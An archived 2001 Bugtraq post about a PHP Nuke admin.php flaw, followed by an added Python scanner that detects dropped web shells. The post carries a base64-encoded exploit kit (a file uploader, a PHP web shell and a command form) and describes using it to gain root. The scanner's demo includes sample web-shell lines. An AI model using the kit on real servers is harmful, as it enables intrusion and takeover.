[22777] in bugtraq
Full-xploiting PHP Nuke
daemon@ATHENA.MIT.EDU (RoMaN SoFt / LLFB)
Wed Oct 3 13:04:29 2001
From: RoMaN SoFt / LLFB <roman@madrid.com>
To: bugtraq@securityfocus.com
Date: Wed, 03 Oct 2001 16:40:31 +0200
Message-ID: <qo8mrtkji87691dvasd7f5dv5mfjlv64b0@4ax.com>
Hi.
This post is related to Francisco Burzi's PHP Nuke (bugtraq id 3361):
http://www.twlc.net/article.php?sid=421
http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3361
The discussed bug is *very* serious. I will try to demonstrate it ;-)
In the earlier advisory by twlc it is described how to use the admin.php
script's bug for copying _existing_ files *inside* the remote machine,
but NOT how to upload files. The first exploit is described in the
advisory. The second one is described here and is attached as
"phpnuker.html" :-). It permits uploading arbitrary files to the
victim server, usually as the "apache" user (depending on the webserver's
configuration). Have a look at the code to adjust some parameters:
servername/ip and remote directory.
I've also created two other "scripts" (well, the last one is really an
HTML form): rs.php and cmd.html. Using both files you can execute
commands on the victim server (usually as the "apache" user). You have to
upload "rs.php" to the victim webserver and then use the "cmd.html" form
to send the commands to the server.
All the scripts are intuitive so have a look at the code and change
parameters like "victim server name" and "remote directory" (this is
the directory where files will be uploaded to). Don't forget to change
these values.
As you can execute commands on the server, you can try to exploit some
local bug and gain r00t privileges. This is tedious 'cause you
haven't got an interactive shell but it's terribly possible. I got to
r00t a RedHat 7.1 Linux box with Apache 1.3.20 (running as "apache"
user) and with all ports closed except 80 (of course) using this
technique.
Kind regards ;-)
RoMaNSoFt @ irc.irc-hispano.org
roman@deathsdoor.com
----=_vq8mrtchufd9h8crre5g2qutqenkfm9j00.MFSBCHJLHS
Content-Type: application/octet-stream; name=phpnuker.zip
Content-Transfer-Encoding: base64
Content-Description: PHP Nuke-r "kit" :-)
Content-Disposition: attachment; filename=phpnuker.zip
UEsDBBQAAAAIAGR8Qytb+U+9AgEAALQBAAANAAAAcGhwbnVrZXIuaHRtbF1RMW7DMAzcC/QPrKZ2
iIWsge0x6NIgSNEHyBZTE5EsQabi+veVZddAswjk8e5wpMqOramfn8oOla5LJjZYn9/Pu1O8YYBm
gov7UKdPd+RSLtNSZm7SNE5PWbvfJPDjjSN+ECbCTAvze3XBAvYtTx4rYaNh8iqwnPGdVqwEqJbJ
9ZXomP1BynEcizslzBats1JpS33hOy/AIndOV8K7gcVsTr2PDIt1R1pjL6BXNnUx5VJawF2ZmNr9
TL+gdYzwuszeQFPAll2YDrA6LdoxDTalJKu+cZCiLn3yOJLBB3ocMFwTLNYguV7Y/wIOsbHEm/FX
TgHEL3mVfJBc/J1Zrn/1C1BLAwQKAAAAAABIXEIrtAa+CiEAAAAhAAAADwAAAHBocG51a2VyL3Jz
LnBocDw/cGhwDQogIHN5c3RlbSgiJGEgMj4mMSIpOw0KPz4NClBLAwQUAAAACABJfEMrriHyxHQA
AACKAAAAEQAAAHBocG51a2VyL2NtZC5odG1sLc7BDcIwDAXQOxI7BA8Q36uGCxuwgWkDsYQTq3Ea
sT0p4ub/9PXl+Vk2cRItlTWAlmrgaDEuOUAy0wmx9+53HiZ+KYIs9IoVt+o1KVzPp5usk5s5azOX
SWIAOvgv9tEhtT2Ex/RO7zbivWXHdvnV8PhgHF9QSwECFAAUAAAACABkfEMrW/lPvQIBAAC0AQAA
DQAAAAAAAAABACAAtoEAAAAAcGhwbnVrZXIuaHRtbFBLAQIUAAoAAAAAAEhcQiu0Br4KIQAAACEA
AAAPAAAAAAAAAAEAIAC2gS0BAABwaHBudWtlci9ycy5waHBQSwECFAAUAAAACABJfEMrriHyxHQA
AACKAAAAEQAAAAAAAAABACAAtoF7AQAAcGhwbnVrZXIvY21kLmh0bWxQSwUGAAAAAAMAAwC3AAAA
HgIAAAAA
----=_vq8mrtchufd9h8crre5g2qutqenkfm9j00.MFSBCHJLHS--
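The post's workflow leaves two traces a defender can look for: a PHP file that appears in the document root without going through a deployment, and PHP source that hands request data straight to a shell-execution function. The following scanner is an added example written for this archive page; it is not part of the post, the attached kit, or PHP Nuke. It takes a known-good manifest of PHP files (the `BASELINE` set, an assumption standing in for whatever integrity list a site keeps), reports PHP files under the web root that are missing from it, and classifies every `system()`/`exec()`-style call in those files by where its command string comes from. The sample files and manifest are constructed for the demo.

```python
import os
import re
import tempfile

# Added example; not code from the Bugtraq post or its attachment.
# PHP functions whose first argument is run through a shell.
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
EXEC_CALL = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.IGNORECASE)
VAR = re.compile(r"\$([A-Za-z_]\w*)")
# Request-derived superglobals, including the pre-4.1 names.
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE", "HTTP_GET_VARS", "HTTP_POST_VARS"}


def _command_argument(src, start):
    """Return the first argument of the call whose '(' sits at src[start].

    Stops at a top-level comma or the matching ')'. String literals are
    tracked so a comma inside quotes does not end the argument early."""
    depth, quote, i = 0, None, start
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1                      # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return src[start + 1:i]
        elif ch == "," and depth == 1:
            return src[start + 1:i]
        i += 1
    return src[start + 1:]


def scan_php_source(src):
    """Classify each shell-execution call in one PHP file.

    Returns (function, classification) tuples:
      'request-to-shell'    command string reads a request superglobal
      'unassigned-to-shell' command uses a variable the file never assigns,
                            i.e. it only has a value if register_globals
                            fills it from the request
      'dynamic-command'     command uses a variable assigned in the file
    Calls with a constant command string are not reported."""
    findings = []
    for m in EXEC_CALL.finditer(src):
        arg = _command_argument(src, m.end() - 1)
        names = set(VAR.findall(arg))
        if not names:
            continue
        if names & SUPERGLOBALS:
            kind = "request-to-shell"
        elif any(not re.search(r"\$%s\b\s*=(?!=)" % re.escape(n), src) for n in names):
            kind = "unassigned-to-shell"
        else:
            kind = "dynamic-command"
        findings.append((m.group(1).lower(), kind))
    return findings


def find_new_php_files(root, baseline):
    """PHP files under root whose root-relative path is not in the manifest.

    The web server account should have no write access to the document
    root, so any file outside the manifest is a candidate dropped script."""
    new = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".php3", ".phtml")):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                if rel not in baseline:
                    new.append(rel)
    return sorted(new)


# Constructed demo content; the paths and bodies are not from the post.
SAMPLE_FILES = {
    "index.php": '<?php echo "hello"; system("/usr/bin/uptime"); ?>',
    "uploads/r.php": '<?php system($_GET["cmd"]); ?>',
    "uploads/s.php": '<?php passthru("$c 2>&1"); ?>',
    "lib/cron.php": '<?php $job = "/usr/bin/true"; exec($job, $out); ?>',
}
BASELINE = {"index.php", "lib/cron.php"}  # hypothetical known-good manifest


def demo():
    """Write the samples to a temp web root and scan the unlisted files."""
    root = tempfile.mkdtemp()
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    report = {}
    for rel in find_new_php_files(root, BASELINE):
        with open(os.path.join(root, rel)) as fh:
            report[rel] = scan_php_source(fh.read())
    return report


if __name__ == "__main__":
    for rel, findings in demo().items():
        print(rel, findings or "no shell-execution calls")
```

The classifier only looks one hop deep: a file that copies `$_GET` into a local variable and then executes that variable is reported as `dynamic-command`, not `request-to-shell`, so treat every entry for an unlisted file as worth a manual look. Running the manifest check from outside the web server account (for example from cron as root, or from a host-integrity agent) matters more than the regexes, since a file the "apache" user cannot write is a file the post's upload step cannot create.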